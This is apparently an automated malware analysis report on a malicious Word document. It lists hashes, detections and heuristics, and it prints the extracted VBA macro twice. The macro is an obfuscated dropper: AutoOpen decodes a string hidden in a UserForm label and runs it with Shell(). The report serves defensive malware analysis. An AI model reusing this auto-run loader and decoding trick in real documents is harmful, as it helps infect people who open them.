Office (OLE) malware analysis — malicious · 689758d11e57287c

MALICIOUS

Office (OLE)

110.0 KB Created: 2017-07-13 05:16:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 0797cb4d70a6b2cd187f29e1118894bd SHA-1: 7e94ba7b101834e6a41726dbd94d29b7c7202282 SHA-256: 689758d11e57287c809250a14b38fa2833b2c7895a7823562fca85e87c740b84

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros with an autoopen routine that calls the Shell() function, indicating it's designed to execute a payload. The document body explicitly instructs the user to 'Enable Content' to view secure information, a common lure for macro-based malware. The ClamAV detection name 'Doc.Dropper.Agent-6520162-0' further supports its nature as a dropper.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6520162-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6520162-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v3/contenttype/formsIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/In document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.microsoft.com/office/infopath/2007/PartnerControlsIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/internal/obdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1928 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1928 bytes
SHA-256: `5195b8256d915c0186bccec874fac493fa418a61e142ce317d33b8b8da4f9a22`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() Rem bap bap bap bessameat End Sub Attribute VB_Name = "Module1" Sub bessameat() Dim str2 As String Dim id As Integer Dim ota As Integer With UserForm1.Label1 ota = .Left End With Dim j As Integer str2 = vantalin(ota) For j = 0 To 1 supernosa (str2) id = id + 1 Next End Sub Sub supernosa(jon) Dim td As Integer td = 254 jsdf = Len(jon) td = jsdf - td If jsdf = 254 Then Shell jon, td End If End Sub Function vantalin(cde) Dim QlyC As String Dim Eftdxb() As Byte Dim Vfxbovft() As Byte Dim askg As String askg = "M1Z8CKV" Dim LanjyA As String LanjyA = UserForm1.Label2.Caption Dim Nyji As String Dim Jvpbobb() As Byte QlyC = "IhgypyadO" Vfxbovft = LanjyA Eftdxb = askg Ru = UBound(Vfxbovft) Nyji = "Moaygys" Dim Lkej5 As String Yrb = UBound(Eftdxb) Lkej5 = "" cde = cde - 11 For iifyjn = 0 To Ru nvf8 = 0 For ob = 0 To Yrb If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1 Next If nvf8 = 0 Then city = Vfxbovft(iifyjn) - cde Lkej5 = Lkej5 + Chr$(city) End If Next Dim Rogy As String vantalin = Lkej5 Rogy = "Create document" End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{D99F50C2-1CC4-4C88-9387-FEFC4D9A26C5}{952455F0-1062-4F4B-8C62-FD5D484C4145}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() Label1.Caption = "Start" End Sub Private Sub Label3_Click() End Sub

SHA-256: 5195b8256d915c0186bccec874fac493fa418a61e142ce317d33b8b8da4f9a22

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Rem bap bap bap
bessameat
End Sub


Attribute VB_Name = "Module1"

Sub bessameat()
Dim str2 As String
Dim id As Integer

Dim ota As Integer
With UserForm1.Label1


ota = .Left
End With

Dim j As Integer
str2 = vantalin(ota)

For j = 0 To 1
supernosa (str2)
id = id + 1

Next


End Sub

Sub supernosa(jon)
Dim td As Integer
td = 254

jsdf = Len(jon)

td = jsdf - td

If jsdf = 254 Then

Shell jon, td
End If

End Sub



Function vantalin(cde)

Dim QlyC As String
Dim Eftdxb() As Byte
Dim Vfxbovft() As Byte
Dim askg As String

askg = "M1Z8CKV"
Dim LanjyA As String
LanjyA = UserForm1.Label2.Caption
Dim Nyji As String

Dim Jvpbobb() As Byte
QlyC = "IhgypyadO"
Vfxbovft = LanjyA

Eftdxb = askg
Ru = UBound(Vfxbovft)
Nyji = "Moaygys"
Dim Lkej5 As String

Yrb = UBound(Eftdxb)
Lkej5 = ""
cde = cde - 11
For iifyjn = 0 To Ru
nvf8 = 0
For ob = 0 To Yrb

If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1
Next
If nvf8 = 0 Then
city = Vfxbovft(iifyjn) - cde
Lkej5 = Lkej5 + Chr$(city)

End If

Next
Dim Rogy As String

vantalin = Lkej5
Rogy = "Create document"

End Function






Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D99F50C2-1CC4-4C88-9387-FEFC4D9A26C5}{952455F0-1062-4F4B-8C62-FD5D484C4145}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
 Label1.Caption = "Start"
End Sub

Private Sub Label3_Click()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.